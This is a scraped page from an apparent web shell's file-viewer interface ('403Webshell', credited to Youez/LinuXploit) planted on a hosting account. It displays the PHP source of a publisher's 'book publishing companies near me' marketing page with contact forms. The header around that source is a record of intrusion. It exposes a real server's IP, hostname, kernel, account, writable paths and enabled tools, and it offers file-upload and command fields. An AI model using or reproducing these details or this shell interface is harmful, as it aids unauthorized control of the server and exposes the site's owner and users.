403Webshell
Server IP : 192.169.170.185  /  Your IP : 216.73.216.97
Web Server : Apache
System : Linux p3plmcpnl495852.prod.phx3.secureserver.net 4.18.0-553.52.1.lve.el8.x86_64 #1 SMP Wed May 21 15:31:29 UTC 2025 x86_64
User : akhilnew ( 1712764)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/akhilnew/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/akhilnew/public_html/book-publishing-companies-near-me.php
<?php
require_once('header.php');
echo '<div class="row head main"><div class="col s12 m12 l12 center-align"><h1>'.$pagetitle.'</h1></div></div>';
?>

<?php
$countries = '';
$stmt = $mysqli->prepare("SELECT nicename, phonecode FROM country WHERE phonecode != '0' ORDER BY nicename");
$stmt->execute();
$stmt->store_result();
$stmt->bind_result($nicename, $phonecode);
while($stmt->fetch()):
	$countries .= '<option value="' . $phonecode . '" ' . ($phonecode == '91' ? 'selected' : '') . '>' . $nicename . '</option>';
endwhile;
$stmt->close();
?>

<div class="card card-primary">
	<div class="card-content" style="display:inherit;">
		<p>If you are an aspiring author searching for a book publishing company near you, the world of publishing can feel overwhelming. With so many options available, finding a publisher that understands your vision and offers comprehensive support is crucial. One such reliable name in the world of academic and research book publishing is AkiNik Publications.</p>
		<br clear="all">
		<p>Whether you are a scholar, researcher, or educator looking to publish your book, AkiNik Publications provides a seamless, author-friendly process for transforming your manuscript into a published work. Here's why AkiNik Publications should be at the top of your list when considering nearby publishing companies.</p>
	</div>
</div>

<br clear="all"><br clear="all">

<div class="row">
	<div class="col s12 m12 l6" style="display:flex;justify-content:center;align-items:center;">
		<img src="https://www.akinik.com/images/self-publishing-a-book-enquiry.jpg" alt="Book Publishing Companies Near Me" title="Book Publishing Companies Near Me">
	</div>
	<div class="col s12 m12 l6">
		<form action="<?php echo $baseurl; ?>self-publishing-a-book" method="post" name="contactform" onsubmit="return pageform(this)">
			<input type="hidden" name="<?php echo $token_id; ?>" value="<?php echo $token_value; ?>" autocomplete="off" readonly />
			<input type="hidden" name="focus" value="<?php echo $en->encrypt('[SELF_PUBLISH]'); ?>" autocomplete="off" readonly />
			<input type="hidden" name="zipcode" value="" readonly />
			<input type="hidden" name="recaptcha_response" class="recaptchaResponse">
			<div class="card card-primary">
				<div class="card-content">
					<div class="card-form">
						<div class="card-title center-align" style="font-weight: 500;">Get in Touch!</div>
						<div class="row">
							<div class="col s12 m6 l6">
								<label for="name">name</label>
								<input type="text" name="name" id="name" class="form-control" />
							</div>
							<div class="col s12 m6 l6">
								<label for="email">email</label>
								<input type="text" name="email" id="email" class="form-control" />
							</div>
						</div>
						<div class="row">
							<div class="col s12 m6 l6">
								<label for="country">country</label>
								<select name="country" id="country" class="browser-default form-control">
									<option value="" selected="selected">Select country</option>
									<?php echo $countries; ?>
								</select>
							</div>
							<div class="col s12 m6 l6">
								<label for="phone">WhatsApp Number</label>
								<input type="text" name="phone" id="phone" class="form-control" />
							</div>
						</div>
						<div class="row">
							<div class="col s12 m12 l12">
								<label for="message">message</label>
								<textarea rows="5" cols="5" name="message" id="message" class="form-control" style="height: 100px !important;"></textarea>
							</div>
						</div>
						<div class="row">
							<div class="col s12 m12 l12">
								<label for="skycolor">What is color of sky in day? (Anti Spam Question)</label>
								<select name="skycolor" class="browser-default form-control">
									<option value="" selected>Select sky color</option>
									<option value="blue">Blue</option>
									<option value="black">Black</option>
									<option value="green">Green</option>
									<option value="orange">Orange</option>
								</select>
							</div>
						</div>
					</div>
				</div>
				<div class="card-action">
					<button style="width: 100%;" type="submit" name="submit" class="waves-effect btn-flat blue accent-3 white-text" disabled>submit</button>
				</div>
			</div>
		</form>
	</div>
</div>

<br clear="all"><br clear="all">

<div class="center-align">
	<h2 style="font-size: 20px;color: #2668b1;">Why Choose AkiNik Publications?</h2>
</div>

<br clear="all"><br clear="all">

<div class="card card-primary">
	<div class="card-content">
		<div class="order-0">
			<h4 class="card-ribbon" style="background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#017eff padding-box;">Expertise in Academic and Research Publishing</h4>
			<br clear="both">
			<p>AkiNik Publications specializes in academic and research publications, making it the ideal choice for authors in various fields such as science, technology, engineering, medicine, and social sciences. With years of experience in academic publishing, they understand the nuances of scholarly work, ensuring that your research is presented professionally and reaches the right audience.</p>
		</div>
	</div>
</div>

<br clear="all"><br clear="all">

<div class="card card-primary">
	<div class="card-content">
		<div class="order-0">
			<h4 class="card-ribbon" style="background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#ef5350 padding-box;">End-to-End Support</h4>
			<br clear="both">
			<p>From manuscript submission to final publication, AkiNik Publications provides end-to-end support throughout the publishing journey. Whether you are a first-time author or an experienced researcher, their team assists with all aspects, including editing, formatting, design, and distribution. This support ensures that your book meets the highest academic standards, ready to compete in the global market.</p>
		</div>
	</div>
</div>

<br clear="all"><br clear="all">

<div class="card card-primary">
	<div class="card-content">
		<div class="order-0">
			<h4 class="card-ribbon" style="background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#ab47bc padding-box;">Multiple Submission Options</h4>
			<br clear="both">
			<p>AkiNik Publications offers various submission methods, making the process as convenient as possible for authors:</p>
			<br clear="both">
			<ul class="browser-default">
				<li><strong>Email Submission:</strong> You can easily submit your manuscript via email to publish@akinik.com.</li>
				<li><strong>Online Submission Portal:</strong> The website's user-friendly portal allows for easy upload and submission of your manuscript, making it simple to track your book's progress.</li>
				<li><strong>Support on Call:</strong> If you have any queries or need assistance during the submission process, the AkiNik team is just a phone call away to help you navigate the process smoothly.</li>
			</ul>
		</div>
	</div>
</div>

<br clear="all"><br clear="all">

<div class="card card-primary">
	<div class="card-content">
		<div class="order-0">
			<h4 class="card-ribbon" style="background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#5c6bc0 padding-box;">Wide Reach and Global Distribution</h4>
			<br clear="both">
			<p>One of the standout features of AkiNik Publications is its vast distribution network. By choosing AkiNik Publications, you ensure that your book reaches academic institutions, libraries, research centers, and a global audience through both print and digital formats. This global reach maximizes your book's impact, ensuring it is accessible to readers worldwide.</p>
		</div>
	</div>
</div>

<br clear="all"><br clear="all">

<div class="card card-primary">
	<div class="card-content">
		<div class="order-0">
			<h4 class="card-ribbon" style="background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#26a69a padding-box;">Customized Publishing Plans</h4>
			<br clear="both">
			<p>Every book is unique, and AkiNik Publications offers customized publishing plans to suit your specific needs. Whether you're publishing a full-length textbook, a research monograph, or an edited volume, the team tailors the process to match your goals. Authors have the flexibility to choose between print, digital, or hybrid models based on their audience and distribution preferences.</p>
		</div>
	</div>
</div>

<br clear="all"><br clear="all">

<div class="card card-primary">
	<div class="card-content">
		<div class="order-0">
			<h4 class="card-ribbon" style="background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#827717 padding-box;">Affordable Publishing Solutions</h4>
			<br clear="both">
			<p>AkiNik Publications understands the financial constraints faced by many researchers and academics. They offer affordable publishing solutions without compromising on quality. The transparent pricing structure ensures that there are no hidden fees, allowing you to focus on bringing your work to life rather than worrying about costs.</p>
		</div>
	</div>
</div>

<br clear="all"><br clear="all">

<div class="card card-primary">
	<div class="card-content">
		<div class="order-0">
			<h4 class="card-ribbon" style="background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#f57f17 padding-box;">Professional Editing and Design Services</h4>
			<br clear="both">
			<p>Quality is paramount at AkiNik Publications. They provide professional editing services to ensure that your manuscript is free from errors and maintains a coherent structure. Additionally, their expert designers craft visually appealing covers and internal layouts that align with the standards expected of high-quality academic publications.</p>
		</div>
	</div>
</div>

<br clear="all"><br clear="all">

<div class="card card-primary">
	<div class="card-content">
		<div class="order-0">
			<h4 class="card-ribbon" style="background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#8d6e63 padding-box;">Peer-Reviewed Publications</h4>
			<br clear="both">
			<p>For academic authors, peer-reviewed publications are essential. AkiNik Publications emphasizes quality and academic rigor by providing peer-review services for your manuscripts. This ensures that your book is not only accurate and comprehensive but also holds up to academic scrutiny, adding credibility to your research.</p>
		</div>
	</div>
</div>

<br clear="both"><br clear="both">

<div class="inlineform">
	<h2 class="inlineformtitle">Are you Ready to submit your book</h2>

	<form action="<?php echo $baseurl; ?>self-publishing-a-book" method="post" name="contactform" onsubmit="return pageform(this)">
		<input type="hidden" name="<?php echo $token_id; ?>" value="<?php echo $token_value; ?>" autocomplete="off" readonly />
		<input type="hidden" name="focus" value="<?php echo $en->encrypt('[SELF_PUBLISH_INLINE]'); ?>" autocomplete="off" readonly />
		<input type="hidden" name="zipcode" value="" readonly />
		<input type="hidden" name="recaptcha_response" class="recaptchaResponse">
		<div class="flexible">
			<div class="input-group">
				<input type="text" name="name" id="name" class="form-control" placeholder="Full name" />
			</div>
			<div class="input-group">
				<input type="text" name="email" id="email" class="form-control" placeholder="Email address" />
			</div>
			<div class="input-group">
				<select name="country" class="browser-default">
					<option value="" selected="selected">Select country</option>
					<?php echo $countries; ?>
				</select>
			</div>
			<div class="input-group">
				<input type="text" name="phone" id="phone" class="form-control" placeholder="WhatsApp number" />
			</div>
			<div class="input-group">
				<input type="text" name="message" id="message" class="form-control" placeholder="Message" />
			</div>
		</div>
		<div class="flexible" style="margin-top: 15px;">
			<button type="submit" name="submit" class="waves-effect btn-flat black white-text" disabled>submit</button>
		</div>
	</form>
</div>

<br clear="all"><br clear="all">

<div class="card card-primary">
	<div class="card-content">
		<div class="row">
			<div class="col s12 m12 l4" style="display:flex;justify-content:center;align-items:center;">
				<img src="https://www.akinik.com/images/the-akinik-advantage.png" alt="The AkiNik Advantage" title="The AkiNik Advantage">
			</div>
			<div class="col s12 m12 l8">
				<h2 style="font-size:24px;">The AkiNik Advantage</h2><br clear="all">
				<p>Choosing AkiNik Publications as your publishing partner gives you access to a trusted team of professionals dedicated to bringing your book to life. Their comprehensive services and commitment to quality make them one of the best book publishing companies for academic and research authors. Whether you're looking for a publisher nearby or one with a global footprint, AkiNik Publications offers the expertise, support, and resources needed to successfully publish your book.</p><br clear="all">
				<p>If you are searching for book publishing companies near me, look no further than AkiNik Publications. With their academic expertise, end-to-end support, global reach, and affordable solutions, AkiNik is an excellent choice for authors looking to publish their books. Whether you are publishing your first manuscript or adding to your portfolio, AkiNik Publications ensures that your book reaches its full potential.</p><br clear="all">
				<p>Start your publishing journey with AkiNik Publications today and bring your book from manuscript to published reality! For more information or to submit your book, visit their website or contact their team for personalized support.</p>
			</div>
		</div>
	</div>
</div>

<br clear="all"><br clear="all">

<style>
#toast-container{min-width: 10%;top: 50%;right: 50%;transform: translateX(50%) translateY(50%);}
@media (max-width:768px) {
	#toast-container{width: 100%;}
}
</style>

<script id="recaptchaapiurl" src="https://www.google.com/recaptcha/api.js?render=6LdSR1gpAAAAANGL6NHCNF33osMAjWSBZFEQeDYs" defer></script>
<script defer>
	window.addEventListener('load', function () {
		grecaptcha.ready(function () {
			grecaptcha.execute((new URL(recaptchaapiurl.src)).searchParams.get('render'), { action: 'contact' }).then(function (token) {
				document.querySelectorAll('.recaptchaResponse').forEach(e => {
					e.value = token;
				})
			});
		});
	})
	function pageform(f) {
		if (document.querySelector('.toast')) {
			document.querySelector('.toast').remove();
		}
		f.submit.disabled = true;
		fetch(f.action, {method: 'post',mode: 'same-origin',cache: 'no-cache',headers: {'Accept': 'application/json'},body: new FormData(f)}).then(response => response.json()).then(r => {
			if(r.s === false) {
				M.toast({html: r.t, classes: 'red'})
			}
			if(r.s === true) {
				M.toast({html: r.t, classes: 'green'});f.reset();
			}
		}).catch(error => {alert(error)}).finally(() => {
			f.submit.disabled = false;
			grecaptcha.ready(function () {
				grecaptcha.execute((new URL(recaptchaapiurl.src)).searchParams.get('render'), { action: 'contact' }).then(function (token) {
					document.querySelectorAll('.recaptchaResponse').forEach(e => {
						e.value = token;
					})
				});
			});
		});
		return false;
	}
</script>

<?php
require_once('footer.php');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit